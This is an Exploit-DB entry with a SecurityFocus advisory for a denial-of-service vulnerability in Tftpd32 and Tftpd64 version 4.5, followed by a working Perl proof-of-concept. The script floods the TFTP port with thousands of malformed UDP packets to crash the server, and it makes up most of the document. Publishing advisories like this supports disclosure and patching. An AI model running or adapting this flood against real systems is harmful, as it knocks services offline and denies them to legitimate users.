TFTPD32 / Tftpd64 - Denial of Service

EDB-ID:

39331

CVE:



Author:

j0s3h4x0r

Type:

dos


Platform:

Windows

Date:

2014-05-14


source: https://www.securityfocus.com/bid/67404/info

Tftpd32 and Tftpd64 are prone to denial-of-service vulnerabilities.

An attacker can exploit this issue to crash the affected application, denying service to legitimate users. Due to the nature of this issue, code-execution may be possible; however this has not been confirmed.

The following products are vulnerable:

Tftpd32 4.5
Tftpd64 4.5

#!/usr/bin/perl -w
 
use IO::Socket;
 
for (my $j = 0; $j < 2; $j++)
{
    sleep(2);
    for (my $i = 0; $i < 1500; $i++)
    {
        $st_socket = IO::Socket::INET->new(Proto=>'udp', 
PeerAddr=>'127.0.0.1', PeerPort=>69) or die "connect error";
     
        $p_c_buffer = "\x0c\x0d" x 10;
     
        print $st_socket $p_c_buffer;
     
        close($st_socket);
 
        print "sent " . $i . "\n";
    }
}
 
exit;